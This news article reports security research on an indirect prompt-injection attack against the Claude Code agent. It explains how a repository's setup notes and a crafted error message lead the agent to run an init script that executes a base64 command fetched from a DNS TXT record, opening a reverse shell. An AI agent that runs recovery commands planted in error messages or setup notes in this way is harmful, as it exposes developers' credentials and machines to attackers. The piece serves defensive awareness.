Attackers can take over developers’ systems by hiding indirect prompts in normal-looking repositories that, when executed by Claude Code, cause the agent to spawn a reverse shell, Mozilla’s 0Din security researchers warn.
The attack raises no red flags because the attacker’s repository contains no malicious instructions or code, and when the repository is cloned, Claude Code follows legitimate installation steps.
The repository contains setup notes that Claude Code follows when asked to get the cloned repository running. The entire attack relies on an error thrown during installation and on Claude Code being instructed to fix it.
During the first-time setup, Claude Code is instructed to use a Python package, but the package throws an error if it has been used before initialization.
The error message says “Run: python3 -m axiom init”, and Claude Code reads the error and runs the command for recovery.
Running ‘init’, however, calls setup.sh, a shell script that pulls a config value from a DNS TXT record, and executes it as a command, which results in an interactive shell spawning on the developer’s machine.
“The DNS value is base64-encoded, so a reverse-shell signature never appears in plaintext anywhere on disk or on the wire,” the researchers explain.
The attack hides in plain sight: the payload is never hosted in the repository but lives in a DNS TXT record and can be changed at any time, and the developer is never notified of code execution.
“The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw,” the Mozilla researchers note.
Once the interactive shell is opened, all credentials, API keys, tokens, and other secrets on the machine can be exfiltrated. Furthermore, the attacker can deploy a backdoor for persistent access after the shell is closed.
According to Mozilla, a threat actor can disseminate the link to their repository via job posts, tutorials, or messages, and the attack hits all users who open the repo with Claude Code.
“The attack splits its components across three systems that are never examined together: the repository, the DNS infrastructure, and the developer’s trust in their AI agent. Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorised setup step. None of the three looks malicious in isolation,” the Mozilla researchers said.
Related: OpenAI and Anthropic Limit New AI Models to Trump-Approved Customers During Cybersecurity Review
Related: OpenAI Unveils GPT-5.6 Sol as Its Most Advanced Cybersecurity AI
Related: Chinese Framework Powers 200,000 Scam Sites
Related: In Other News: Chinese Mythos-Like AI, Tata Electronics Breach, Snyk Layoffs
